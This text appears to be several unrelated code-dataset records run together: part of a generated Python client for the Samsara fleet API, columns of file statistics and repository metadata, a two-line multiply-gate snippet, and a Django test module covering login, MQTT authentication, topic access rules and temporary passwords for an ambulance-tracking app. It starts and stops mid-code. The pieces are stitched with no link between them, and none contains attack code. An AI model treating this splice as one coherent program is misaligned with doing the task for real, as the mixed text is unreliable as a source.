if 'sensor_param' in params:
body_params = params['sensor_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TemperatureResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_fleet_dispatch_jobs(self, access_token, update_dispatch_jobs_param, **kwargs):
"""
/fleet/dispatch_jobs/update
Update dispatch jobs in the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_fleet_dispatch_jobs(access_token, update_dispatch_jobs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param UpdateDispatchJobsParam update_dispatch_jobs_param: (required)
:return: DispatchJobsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_fleet_dispatch_jobs_with_http_info(access_token, update_dispatch_jobs_param, **kwargs)
else:
(data) = self.update_fleet_dispatch_jobs_with_http_info(access_token, update_dispatch_jobs_param, **kwargs)
return data
def update_fleet_dispatch_jobs_with_http_info(self, access_token, update_dispatch_jobs_param, **kwargs):
"""
/fleet/dispatch_jobs/update
Update dispatch jobs in the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_fleet_dispatch_jobs_with_http_info(access_token, update_dispatch_jobs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param UpdateDispatchJobsParam update_dispatch_jobs_param: (required)
:return: DispatchJobsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'update_dispatch_jobs_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_fleet_dispatch_jobs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `update_fleet_dispatch_jobs`")
# verify the required parameter 'update_dispatch_jobs_param' is set
if ('update_dispatch_jobs_param' not in params) or (params['update_dispatch_jobs_param'] is None):
raise ValueError("Missing the required parameter `update_dispatch_jobs_param` when calling `update_fleet_dispatch_jobs`")
collection_formats = {}
resource_path = '/fleet/dispatch_jobs/update'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'update_dispatch_jobs_param' in params:
body_params = params['update_dispatch_jobs_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DispatchJobsResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_vehicles(self, access_token, vehicle_update_param, **kwargs):
"""
/fleet/set_data
This method enables the mutation of metadata for vehicles in the Samsara Cloud.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_vehicles(access_token, vehicle_update_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param VehicleUpdateParam vehicle_update_param: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_vehicles_with_http_info(access_token, vehicle_update_param, **kwargs)
else:
(data) = self.update_vehicles_with_http_info(access_token, vehicle_update_param, **kwargs)
return data
def update_vehicles_with_http_info(self, access_token, vehicle_update_param, **kwargs):
"""
/fleet/set_data
This method enables the mutation of metadata for vehicles in the Samsara Cloud.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_vehicles_with_http_info(access_token, vehicle_update_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param VehicleUpdateParam vehicle_update_param: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'vehicle_update_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_vehicles" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `update_vehicles`")
# verify the required parameter 'vehicle_update_param' is set
if ('vehicle_update_param' not in params) or (params['vehicle_update_param'] is None):
raise ValueError("Missing the required parameter `vehicle_update_param` when calling `update_vehicles`")
collection_formats = {}
resource_path = '/fleet/set_data'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'vehicle_update_param' in params:
body_params = params['vehicle_update_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
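# Usage sketch (an addition, not part of the generated client above): how the
# synchronous and callback-based asynchronous call styles described in the
# docstrings might look from calling code. The `api` object, `access_token`,
# and the way the *Param models are populated are assumptions; consult the
# generated models for the actual fields.
from pprint import pprint

def callback_function(response):
    # Invoked with the deserialized response (e.g. SensorHistoryResponse)
    # once the asynchronous request completes.
    pprint(response)

# Synchronous style (blocks and returns the deserialized response):
#     history = api.get_sensors_history(access_token, history_param)
# Asynchronous style (returns the request thread; data arrives via the callback):
#     thread = api.get_sensors_history(access_token, history_param,
#                                      callback=callback_function)
#     thread.join()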
| 46.892424
| 1,080
| 0.601818
| 9,783
| 92,847
| 5.448022
| 0.031994
| 0.063154
| 0.017862
| 0.022965
| 0.9618
| 0.944257
| 0.924781
| 0.909359
| 0.900296
| 0.892266
| 0
| 0.00081
| 0.321637
| 92,847
| 1,979
| 1,081
| 46.916119
| 0.845405
| 0.341013
| 0
| 0.772589
| 0
| 0
| 0.199463
| 0.050333
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035533
| false
| 0
| 0.007107
| 0
| 0.095431
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40407326a31fabedd75b526298966251f0e9a166
| 80
|
py
|
Python
|
neural_net_test.py
|
gillett-hernandez/neuralnet
|
a6a3e6f4937a69b84d76d3c1c49171e04c242cab
|
[
"MIT"
] | null | null | null |
neural_net_test.py
|
gillett-hernandez/neuralnet
|
a6a3e6f4937a69b84d76d3c1c49171e04c242cab
|
[
"MIT"
] | null | null | null |
neural_net_test.py
|
gillett-hernandez/neuralnet
|
a6a3e6f4937a69b84d76d3c1c49171e04c242cab
|
[
"MIT"
] | null | null | null |
def forward_multiply_gate(x, y):
    # forward pass of a multiply gate: the output is the product of its two inputs
    return x * y

print(forward_multiply_gate(-2, 3))  # prints -6
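# Companion sketch (an addition, not part of the original neural_net_test.py):
# the corresponding backward pass for the multiply gate, using the chain rule
# d(x*y)/dx = y and d(x*y)/dy = x to route an upstream gradient dz to the inputs.
def backward_multiply_gate(x, y, dz):
    # dz is the gradient flowing back from above; scale the local gradients by it.
    dx = y * dz
    dy = x * dz
    return dx, dy

print(backward_multiply_gate(-2, 3, 1.0))  # prints (3.0, -2.0)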
| 16
| 34
| 0.775
| 15
| 80
| 3.866667
| 0.666667
| 0.517241
| 0.655172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027397
| 0.0875
| 80
| 4
| 35
| 20
| 0.767123
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
404b1f04ae14d5599fd78cb9082c66fb6a4d5fe8
| 35,591
|
py
|
Python
|
login/tests/test_login.py
|
shubhamkulkarni01/EMSTrack-Django
|
32ff9ed94a38730c0e9f6385c75060e2d30a930e
|
[
"MIT",
"BSD-3-Clause"
] | 2
|
2020-07-16T01:44:54.000Z
|
2020-10-25T02:08:47.000Z
|
login/tests/test_login.py
|
shubhamkulkarni01/EMSTrack-Django
|
32ff9ed94a38730c0e9f6385c75060e2d30a930e
|
[
"MIT",
"BSD-3-Clause"
] | 8
|
2020-04-20T22:13:56.000Z
|
2022-02-04T17:50:44.000Z
|
login/tests/test_login.py
|
shubhamkulkarni01/EMSTrack-Django
|
32ff9ed94a38730c0e9f6385c75060e2d30a930e
|
[
"MIT",
"BSD-3-Clause"
] | 2
|
2020-07-20T23:39:44.000Z
|
2022-02-24T00:29:10.000Z
|
import logging
from django.test import Client
from django.conf import settings
from django.contrib.auth.hashers import check_password
from rest_framework.parsers import JSONParser
from io import BytesIO
from ambulance.models import Ambulance
from hospital.models import Hospital
from ..models import TemporaryPassword
from ..serializers import UserProfileSerializer
from mqtt.tests.client import MQTTTestCase
logger = logging.getLogger(__name__)
# TODO: Test admin permissions for staff that is not superuser
class MyTestCase(MQTTTestCase):
@classmethod
def setUpClass(cls):
# create server
super().setUpClass()
# instantiate client
cls.client = Client()
class TestProfile(MyTestCase):
def test_user_profile_serializer(self):
self.maxDiff = None
# test ProfileSerializer
# super will see all ambulances and hospitals
u = self.u1
serializer = UserProfileSerializer(u)
result = {
'ambulances': [
{
'ambulance_id': e.pk,
'ambulance_identifier': e.identifier,
'can_read': True,
'can_write': True
}
for e in Ambulance.objects.all()
],
'hospitals': [
{
'hospital_id': e.pk,
'hospital_name': e.name,
'can_read': True,
'can_write': True
}
for e in Hospital.objects.all()
]
}
self.assertDictEqual(serializer.data, result)
        # regular users are just like ProfileSerializer
for u in (self.u2, self.u3):
serializer = UserProfileSerializer(u)
result = {
'ambulances': [
{
'ambulance_id': e.ambulance.pk,
'ambulance_identifier': e.ambulance.identifier,
'can_read': e.can_read,
'can_write': e.can_write
}
for e in u.userambulancepermission_set.all()
],
'hospitals': [
{
'hospital_id': e.hospital.pk,
'hospital_name': e.hospital.name,
'can_read': e.can_read,
'can_write': e.can_write
}
for e in u.userhospitalpermission_set.all()
]
}
self.assertDictEqual(serializer.data, result)
        # regular users are just like ProfileSerializer with groups
u = self.u4
g = self.g2
serializer = UserProfileSerializer(u)
result = {
'ambulances': [
{
'ambulance_id': e.ambulance.pk,
'ambulance_identifier': e.ambulance.identifier,
'can_read': e.can_read,
'can_write': e.can_write
}
for e in g.groupambulancepermission_set.all()
],
'hospitals': [
{
'hospital_id': e.hospital.pk,
'hospital_name': e.hospital.name,
'can_read': e.can_read,
'can_write': e.can_write
}
for e in g.grouphospitalpermission_set.all()
]
}
self.assertDictEqual(serializer.data, result)
        # regular users are just like ProfileSerializer with groups
u = self.u5
g = self.g2
class TestProfileViewset(MyTestCase):
def test_profile_viewset(self):
# instantiate client
client = Client()
# login as admin
client.login(username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'])
# retrieve own
response = client.get('/en/api/user/{}/profile/'.format(str(self.u1.username)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = UserProfileSerializer(self.u1).data
self.assertDictEqual(result, answer)
# retrieve someone else's
response = client.get('/en/api/user/{}/profile/'.format(str(self.u2.username)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = UserProfileSerializer(self.u2).data
self.assertDictEqual(result, answer)
# retrieve someone else's
response = client.get('/en/api/user/{}/profile/'.format(str(self.u3.username)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = UserProfileSerializer(self.u3).data
self.assertDictEqual(result, answer)
# logout
client.logout()
# login as testuser1
client.login(username='testuser1', password='top_secret')
# retrieve own
response = client.get('/en/api/user/{}/profile/'.format(str(self.u2.username)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = UserProfileSerializer(self.u2).data
self.assertDictEqual(result, answer)
# retrieve someone else's
response = client.get('/en/api/user/{}/profile/'.format(str(self.u1.username)),
follow=True)
self.assertEqual(response.status_code, 403)
response = client.get('/en/api/user/{}/profile/'.format(str(self.u3.username)),
follow=True)
self.assertEqual(response.status_code, 403)
# logout
client.logout()
class TestLogin(MyTestCase):
def test_login(self):
# blank login
response = self.client.get('/en/auth/login/')
self.assertEqual(response.status_code, 200)
# incorrect username
response = self.client.post('/en/auth/login/', {'username': 'testuser11',
'password': 'top_secret'},
follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, False)
# incorrect password
response = self.client.post('/en/auth/login/', {'username': 'testuser1',
'password': 'top_secret0'},
follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, False)
# correct login
response = self.client.post('/en/auth/login/', {'username': 'testuser1',
'password': 'top_secret'},
follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, True)
self.assertEqual(response.context['user'].username, 'testuser1')
self.assertEqual(response.context['user'].is_superuser, False)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, False)
# login user2
response = self.client.post('/en/auth/login/', {'username': 'testuser2',
'password': 'very_secret'},
follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, True)
self.assertEqual(response.context['user'].username, 'testuser2')
self.assertEqual(response.context['user'].is_superuser, False)
# login admin
response = self.client.post('/en/auth/login/', {'username': settings.MQTT['USERNAME'],
'password': settings.MQTT['PASSWORD']},
follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, True)
self.assertEqual(response.context['user'].username, settings.MQTT['USERNAME'])
self.assertEqual(response.context['user'].is_superuser, True)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, False)
class TestMQTTLogin(MyTestCase):
def test_mqtt_login(self):
# blank login
response = self.client.get('/en/auth/mqtt/login/')
self.assertEqual(response.status_code, 200)
# incorrect username
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'testuser11',
'password': 'top_secret'},
follow=True)
self.assertEqual(response.status_code, 403)
        # superuser check: nonexistent username
response = self.client.post('/en/auth/mqtt/superuser/',
{'username': 'testuser11'},
follow=True)
self.assertEqual(response.status_code, 403)
# incorrect password
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'testuser1',
'password': 'top_secret0'},
follow=True)
self.assertEqual(response.status_code, 403)
        # superuser check: username exists but is not a superuser
response = self.client.post('/en/auth/mqtt/superuser/',
{'username': 'testuser1'},
follow=True)
self.assertEqual(response.status_code, 403)
# correct login
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'testuser1',
'password': 'top_secret'},
follow=True)
self.assertEqual(response.status_code, 200)
        # superuser check: username exists but is not a superuser
response = self.client.post('/en/auth/mqtt/superuser/',
{'username': 'testuser1'},
follow=True)
self.assertEqual(response.status_code, 403)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
# login user2
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'testuser2',
'password': 'very_secret'},
follow=True)
self.assertEqual(response.status_code, 200)
        # superuser check: username exists but is not a superuser
response = self.client.post('/en/auth/mqtt/superuser/',
{'username': 'testuser2'},
follow=True)
self.assertEqual(response.status_code, 403)
        # superuser check: valid superuser username
response = self.client.post('/en/auth/mqtt/superuser/',
{'username': settings.MQTT['USERNAME']},
follow=True)
self.assertEqual(response.status_code, 200)
# login admin
response = self.client.post('/en/auth/mqtt/login/',
{'username': settings.MQTT['USERNAME'],
'password': settings.MQTT['PASSWORD']},
follow=True)
self.assertEqual(response.status_code, 200)
        # superuser check: valid superuser username
response = self.client.post('/en/auth/mqtt/superuser/',
{'username': settings.MQTT['USERNAME']},
follow=True)
self.assertEqual(response.status_code, 200)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
class TestMQTTACLSubscribe(MyTestCase):
def test_mqtt_acl_subscribe(self):
# Settings
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/settings'},
follow=True)
self.assertEqual(response.status_code, 200)
# Profile
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/user/testuser1/profile'},
follow=True)
self.assertEqual(response.status_code, 200)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '2',
'topic': '/user/testuser1/profile'},
follow=True)
self.assertEqual(response.status_code, 403)
# Hospitals
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/metadata'.format(self.h1.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/metadata'.format(self.h3.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/metadata'.format(self.h2.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/hospital/{}/data'.format(self.h1.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/hospital/{}/data'.format(self.h3.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/hospital/{}/data'.format(self.h2.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/item/1/data'.format(self.h1.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/item/2/data'.format(self.h3.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/item/3/data'.format(self.h2.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/metadata'.format(self.h1.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/metadata'.format(self.h3.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/metadata'.format(self.h2.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# Ambulances
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/ambulance/{}/data'.format(self.a1.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/ambulance/{}/data'.format(self.a3.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/ambulance/{}/data'.format(self.a2.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': 'test_client',
'acc': '1',
'topic': '/ambulance/{}/data'.format(self.a1.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': 'test_client',
'acc': '1',
'topic': '/ambulance/{}/data'.format(self.a3.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': 'test_client',
'acc': '1',
'topic': '/ambulance/{}/data'.format(self.a2.id)},
follow=True)
self.assertEqual(response.status_code, 403)
class TestMQTTACLPublish(MyTestCase):
def test_mqtt_acl_publish(self):
# Ambulance data
# can't publish
clientid = 'test_client'
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser1/client/{}/ambulance/{}/data'.format(clientid, self.a1.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser1/client/{}/ambulance/{}/data'.format(clientid, self.a2.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser1/client/{}/ambulance/{}/data'.format(clientid, self.a3.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser2/client/{}/ambulance/{}/data'.format(clientid, self.a1.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser2/client/{}/ambulance/{}/data'.format(clientid, self.a2.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser2/client/{}/ambulance/{}/data'.format(clientid, self.a3.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# Hospital data
        # can publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser1/client/{}/hospital/{}/data'.format(clientid, self.h1.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser1/client/{}/hospital/{}/data'.format(clientid, self.h2.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser1/client/{}/hospital/{}/data'.format(clientid, self.h3.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser2/client/{}/hospital/{}/data'.format(clientid, self.h1.id)},
follow=True)
self.assertEqual(response.status_code, 403)
        # can publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser2/client/{}/hospital/{}/data'.format(clientid, self.h2.id)},
follow=True)
self.assertEqual(response.status_code, 200)
        # can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser2/client/{}/hospital/{}/data'.format(clientid, self.h3.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# Client data
username = 'testuser2'
clientid = 'test_client'
response = self.client.post('/en/auth/mqtt/acl/',
{'username': username,
'clientid': clientid,
'acc': '2',
'topic': '/user/{}/client/{}/status'.format(username, clientid)},
follow=True)
self.assertEqual(response.status_code, 200)
# invalid username
username = 'testuser2'
clientid = 'test_client'
response = self.client.post('/en/auth/mqtt/acl/',
{'username': username,
'clientid': clientid,
'acc': '2',
'topic': '/user/{}/client/{}/status'.format(username + 'o', clientid)},
follow=True)
self.assertEqual(response.status_code, 403)
# invalid clientid
username = 'testuser2'
clientid = 'test_client'
response = self.client.post('/en/auth/mqtt/acl/',
{'username': username,
'clientid': clientid,
'acc': '2',
'topic': '/user/{}/client/{}/status'.format(username, clientid + 'o')},
follow=True)
self.assertEqual(response.status_code, 403)
class TestMQTTLoginTempPassword(MyTestCase):
def test(self):
# instantiate client
client = Client()
# retrieve password hash without being logged in
username = 'admin'
response = client.get('/en/api/user/{}/password/'.format(username),
follow=True)
result = JSONParser().parse(BytesIO(response.content))
self.assertEqual(response.status_code, 403)
self.assertEqual(result,
{'detail': 'Authentication credentials were not provided.'})
# login as admin
username = settings.MQTT['USERNAME']
client.login(username=settings.MQTT['USERNAME'],
password=settings.MQTT['PASSWORD'])
# retrieve password hash
response = client.get('/en/api/user/{}/password/'.format(username),
follow=True)
self.assertEqual(response.status_code, 200)
encoded = JSONParser().parse(BytesIO(response.content))
# retrieve temporary password
password = TemporaryPassword.objects.get(user__username=username).password
self.assertEqual(check_password(password, encoded), True)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
self.client.logout()
# mqtt login with correct temporary password
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'admin',
'password': encoded},
follow=True)
self.assertEqual(response.status_code, 200)
# mqtt login with incorrect username
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'admino',
'password': encoded},
follow=True)
self.assertEqual(response.status_code, 403)
# mqtt login with incorrect encoded password
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'admin',
'password': encoded + 'r'},
follow=True)
self.assertEqual(response.status_code, 403)
# login as testuser1
username = 'testuser1'
client.login(username=username, password='top_secret')
# retrieve password hash
response = client.get('/en/api/user/{}/password/'.format(username),
follow=True)
self.assertEqual(response.status_code, 200)
encoded = JSONParser().parse(BytesIO(response.content))
# retrieve temporary password
password = TemporaryPassword.objects.get(user__username=username).password
self.assertEqual(check_password(password, encoded), True)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
self.client.logout()
# mqtt login with correct temporary password
response = self.client.post('/en/auth/mqtt/login/',
{'username': username,
'password': encoded},
follow=True)
self.assertEqual(response.status_code, 200)
# mqtt login with incorrect username
response = self.client.post('/en/auth/mqtt/login/',
{'username': username + 'o',
'password': encoded},
follow=True)
self.assertEqual(response.status_code, 403)
# mqtt login with incorrect encoded password
response = self.client.post('/en/auth/mqtt/login/',
{'username': username,
'password': encoded + 'r'},
follow=True)
self.assertEqual(response.status_code, 403)
# login as testuser2
username = 'testuser2'
client.login(username=username, password='very_secret')
# retrieve password hash
response = client.get('/en/api/user/{}/password/'.format(username),
follow=True)
self.assertEqual(response.status_code, 200)
encoded = JSONParser().parse(BytesIO(response.content))
# retrieve temporary password
password = TemporaryPassword.objects.get(user__username=username).password
self.assertEqual(check_password(password, encoded), True)
# logout
